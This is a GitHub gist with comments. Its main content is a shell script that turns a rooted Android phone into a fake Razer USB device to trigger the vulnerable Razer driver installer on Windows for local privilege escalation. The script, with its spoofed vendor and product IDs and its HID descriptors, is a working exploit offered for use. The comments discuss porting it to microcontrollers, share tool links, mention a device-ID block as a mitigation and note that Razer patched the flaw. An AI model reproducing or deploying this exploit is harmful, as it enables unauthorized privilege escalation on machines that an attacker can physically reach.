Skip to content

Instantly share code, notes, and snippets.

@tothi
Created August 22, 2021 09:52
Show Gist options
  • Save tothi/3cdec3aca80e08a406afe695d5448936 to your computer and use it in GitHub Desktop.
Save tothi/3cdec3aca80e08a406afe695d5448936 to your computer and use it in GitHub Desktop.
Razer USB gadget on Android for Local Privilege Escalation on Windows
# MINIMAL USB gadget setup using CONFIGFS for simulating Razer Gaming HID
# devices for triggering the vulnerable Windows Driver installer
# credits for the Windows Driver install vuln: @j0nh4t
#
# https://twitter.com/j0nh4t/status/1429049506021138437
# https://twitter.com/an0n_r0/status/1429263450748895236
#
# the script was developed & tested on Android LineageOS 18.1
# work as root
su
# enable CONFIGFS
mount -t configfs none /sys/kernel/config
# create gadget
mkdir /sys/kernel/config/usb_gadget/pwn_razer
cd /sys/kernel/config/usb_gadget/pwn_razer
# set vendor (Razer) & product id
# for a list of suitable devices see the inf files in driver cab archive
# (feel free to change the product id)
echo 0x1532 > idVendor
echo 0x023e > idProduct
# set USB version 2
echo 0x0200 > bcdUSB
# set device to class to Misc / Interface Association Descriptor.
echo 0xEF > bDeviceClass
echo 0x02 > bDeviceSubClass
echo 0x01 > bDeviceProtocol
# set some info strings
mkdir -p strings/0x409
echo "deadbeefdeadbeef" > strings/0x409/serialnumber
echo "an0n" > strings/0x409/manufacturer
echo "fake Razer device" > strings/0x409/product
mkdir -p configs/c.1/strings/0x409
echo "basic Multi-function device with single TLC (MI_02)" > configs/c.1/strings/0x409/configuration
# set some fake power config values
echo 250 > configs/c.1/MaxPower
echo 0x80 > configs/c.1/bmAttributes
# add 3 mouse HID devices (protocol 2) with a basic HID report descriptor
for i in g1 g2 g3 ; do
mkdir -p functions/hid.${i}
echo 2 > functions/hid.${i}/protocol
echo 6 > functions/hid.${i}/report_length
echo BQEJAqEBCQGhAIUBBQkZASkDFQAlAZUDdQGBApUBdQWBAwUBCTAJMRWBJX91CJUCgQaVAnUIgQHAwAUBCQKhAQkBoQCFAgUJGQEpAxUAJQGVA3UBgQKVAXUFgQEFAQkwCTEVACb/f5UCdRCBAsDA | base64 -d > functions/hid.${i}/report_desc
done
# activate the HID devices
for i in g1 g2 g3 ; do
ln -s functions/hid.${i} configs/c.1/
done
# bind (for activating, disable default gadget and enable the new one)
# might need to be changed (if the active gadget is not in ../g1)
echo "" > ../g1/UDC ; getprop sys.usb.controller > UDC
@tothi
Copy link
Author

tothi commented Aug 24, 2021

Are all the strings/configs required?
I'm trying to make a microcontroller do this but the stack I'm using doesnt let me set the configuration string, MaxPower, or bmAttributes. Also using the report_desc here causes windows to think theres a fault in the device - it seems to be 2 report descriptors back to back...

I can get a razer devices to appear in devices and printers with just the VID and PID (changing PIDs to see different devices), but nothing causing an autoinstall driver...

no, i think you don't need to config every params. but the transports are required (the number of transports (functions) is important, the content is not). check the generated device hardware id in windows and compare it with the genuine.

@827Dream
Copy link

upgraded this to a "tool": https://github.com/tothi/usbgadget-tool

haha, i try this,it can not resolve my problem (because same principle).

@memerememe
Copy link

upgraded this to a "tool": https://github.com/tothi/usbgadget-tool

Wow, this looks amazing, haven't tested out though..

@memerememe
Copy link

Any way i can test this out on a vm without it auto executing on my pc?

@synap5e
Copy link

synap5e commented Aug 25, 2021

Got my microcontroller working to trigger + automate this

pwn.mp4

@synap5e
Copy link

synap5e commented Aug 25, 2021

Any way I can test this out on a vm without it auto executing on my pc?

Should be able to use a USB filter in the VMs usb settings to get the raw-ish device on the VM.
You could look into some of the mitigations people have come up with for your host e.g. https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-R2-and-2008/cc731387(v=ws.10)?redirectedfrom=MSDN#step-1-create-a-list-of-prohibited-devices forUSB\VID_1532

@tothi
Copy link
Author

tothi commented Aug 25, 2021

Got my microcontroller working to trigger + automate this
pwn.mp4

awesome! :)

@memerememe
Copy link

Any way I can test this out on a vm without it auto executing on my pc?

Should be able to use a USB filter in the VMs usb settings to get the raw-ish device on the VM.
You could look into some of the mitigations people have come up with for your host e.g. https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-R2-and-2008/cc731387(v=ws.10)?redirectedfrom=MSDN#step-1-create-a-list-of-prohibited-devices forUSB\VID_1532

Thank you!!

@uraninite
Copy link

Got my microcontroller working to trigger + automate this
pwn.mp4

😮

@w0rm12
Copy link

w0rm12 commented Aug 27, 2021

Got my microcontroller working to trigger + automate this
pwn.mp4

Nice!!! Can you share the code?

@synap5e
Copy link

synap5e commented Sep 7, 2021

Got my microcontroller working to trigger + automate this
pwn.mp4

Nice!!! Can you share the code?

Sorry about the delay.
https://github.com/synap5e/razor-eop-XIAO

@linguine2552
Copy link

lol it even works with just basic PID and VID pairing for P4wnP1.
pwntemp

fyi > Razer patched spawning a simple shell.

@bananabr
Copy link

bananabr commented Apr 1, 2024

I know it's been a while, but is this still supposed to work? I know the vulnerability is patched by now, but I can't even make the co-installer run.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment